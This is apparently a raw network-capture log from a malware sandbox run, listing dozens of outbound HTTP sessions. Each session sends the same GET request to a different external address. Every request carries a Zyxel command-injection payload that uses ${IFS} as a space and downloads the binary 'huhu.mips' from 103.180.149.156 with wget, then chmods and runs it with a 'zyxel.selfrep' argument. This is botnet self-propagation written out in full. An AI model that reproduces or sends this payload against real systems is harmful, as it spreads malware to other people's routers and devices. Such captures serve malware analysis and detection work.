                                            Feb 2, 2024 06:21:24.870328903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7561192.168.2.1560428190.146.1.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870388031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7562192.168.2.154894899.15.136.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870429993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7563192.168.2.153672874.123.109.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870471001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7564192.168.2.1555056135.142.189.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870524883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7565192.168.2.1544566208.113.154.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870554924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7566192.168.2.1538948142.243.109.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870608091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7567192.168.2.1553786102.27.183.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870642900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7568192.168.2.154574483.101.11.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870693922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7569192.168.2.1558514123.153.225.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870727062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7570192.168.2.155610283.14.242.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870774984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7571192.168.2.155737871.186.162.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870815992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7572192.168.2.155457699.218.57.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870870113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7573192.168.2.153896891.146.63.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870912075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7574192.168.2.153878292.203.32.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870933056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7575192.168.2.1547068192.37.146.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.870990038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7576192.168.2.1557656139.217.40.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871021986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7577192.168.2.153500240.169.125.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871068954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7578192.168.2.1558198183.91.96.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871109962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7579192.168.2.155045470.177.224.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871146917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7580192.168.2.153285697.43.31.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871193886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7581192.168.2.155527037.43.246.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871237993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7582192.168.2.1545408106.37.223.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871273994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7583192.168.2.154834072.205.111.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871304035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7584192.168.2.1548558159.124.201.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871346951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7585192.168.2.1534336146.55.203.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871382952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7586192.168.2.1548728140.87.187.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871411085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7587192.168.2.1560004205.181.211.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871495962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7588192.168.2.1548944167.137.176.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871537924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7589192.168.2.1534120138.215.51.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871557951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7590192.168.2.1536786183.200.123.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871567965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7591192.168.2.153951447.69.142.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871629953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7592192.168.2.1539262165.95.212.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871660948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7593192.168.2.1540922145.122.48.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871714115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7594192.168.2.1533718189.154.224.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871745110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7595192.168.2.1539282219.1.214.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871804953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7596192.168.2.153584424.114.91.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871853113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7597192.168.2.1534252191.79.203.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871900082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7598192.168.2.1550924106.19.148.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871937990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7599192.168.2.1557686222.62.195.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.871980906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7600192.168.2.155986869.161.171.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872039080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7601192.168.2.1548766117.88.90.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872071981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7602192.168.2.1535076163.188.219.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872123003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7603192.168.2.1540408131.162.5.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872165918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7604192.168.2.1546538194.225.117.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872212887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7605192.168.2.1533934139.239.125.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872251034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7606192.168.2.1543232213.239.92.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872283936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7607192.168.2.1553688101.101.122.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872323036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7608192.168.2.1533676107.85.195.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872363091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7609192.168.2.153617236.189.92.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872423887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7610192.168.2.155420247.29.157.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872462988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7611192.168.2.154651458.29.198.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872482061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7612192.168.2.1543144106.145.141.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872500896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7613192.168.2.1540708201.202.197.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872560024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7614192.168.2.155201023.202.199.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872582912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7615192.168.2.1552070198.157.216.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872662067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7616192.168.2.154988614.85.53.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872708082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7617192.168.2.154256698.43.117.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872744083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7618192.168.2.1558928147.137.88.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872770071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7619192.168.2.1551746129.31.81.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872808933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7620192.168.2.1536790185.111.28.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872885942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7621192.168.2.155028042.149.153.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872922897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7622192.168.2.1559984125.234.246.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872963905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7623192.168.2.153319034.152.196.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:24.872978926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7624192.168.2.1548220153.19.243.89443
                                            TimestampBytes transferredDirectionData
